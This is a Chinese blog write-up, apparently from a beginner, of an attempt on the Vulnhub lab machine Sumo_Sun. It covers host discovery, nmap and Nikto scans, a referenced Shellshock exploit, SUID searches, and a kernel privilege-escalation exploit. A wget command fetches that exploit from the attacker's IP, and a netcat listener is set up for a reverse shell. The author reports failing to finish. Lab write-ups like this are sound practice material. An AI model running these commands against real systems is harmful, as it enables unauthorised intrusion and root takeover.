靶机渗透测试(Sumo_Sun*)

靶机渗透测试(Sumo_Sun*):

Vulnhub靶机 Sumo_Sun*
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(Beginner
目标:成功渗透进入靶机,得到root shell ,提升至root权限!
在这里插入图片描述


渗透流程:

1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)

得到靶机ip地址:192.168.10.22
在这里插入图片描述


2. nmap进行靶机端口服务扫描

nmap -sS -Pn -A -p- -n 靶机ip

在这里插入图片描述
发现靶机开放了22-ssh端口服务,与80-http服务端口;


3. 根据端口服务进行渗透(80-http端口服务)

3.1 web网页渗透:
进入web网页,查看源代码信息等等,无果!!!

在这里插入图片描述

3.2 目录扫描:
御剑,kali-dirb工具进行目录扫描:
dirb http://192.168.10.22
并没有扫出有用目录!!!
尝试了/usr/share/dirb/wordlists中的每个单词列表,但是都未返回任何结果,只有一个/cgi-bin/test脚本。
在这里插入图片描述
3.3 使用kali工具Nikto:(nikto -h 靶机ip)
 揭示了两个潜在的攻击向量,包括shellshock,以及由于Apache模块强制使用文件名的能力,在google中找出如何利用shellshock漏洞后,能够利用shellshock漏洞:https://www.exploit-db.com/exploits/34900
 在这里插入图片描述

3.4 下载py脚本至kali虚拟机,运行Python命令;

在这里插入图片描述

3.5 权限提升

搜索目录,无果!!
检查了SUID二进制文件,但它没有返回任何有用的结果。
  find / perm -u=s -type f 2 >/dev/null
检查了所有具有777权限的文件,同样没有得到有用的结果。
  find / -type f -perm -0777


3.6 内核检测:

下一步检查是否存在任何内核漏洞。使用命令检查内核版本:
searchsploit 内核版本
在这里插入图片描述

searchsploit 3.2.0
在这里插入图片描述
列表中有内核漏洞,允许本地特权升级。使用命令locate linux_x86-64/local/33589.c 可以查找给文件在kali中的具体地址。在kali开启apache服务,然后把33589文件放在/var/www/html/下,在shell中使用wget命令下载文件 wget http://172.168.10.37/33589.c,使用python打开个终端,python -c ‘import pty;pty.spawn("/bin/bash")’
在这里插入图片描述


3.7 gcc编译:

gcc 33589.c -O2 -o exploit
  ./exploit 0
在这里插入图片描述

使用命令反弹shell,再开个终端监听端口:

nc -lvnp 6666

在这里插入图片描述


实验总结:

该靶机使用kali的脏牛提权,以及需要自己上网查阅版本漏洞,编译脚本,和添加新的环境变量,对于自己来说,工作技术要求太大,未能成功实现渗透!!!默默的记录一波,哭辽~~

大佬博客:
https://www.cnblogs.com/xydd/p/13185758.html

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值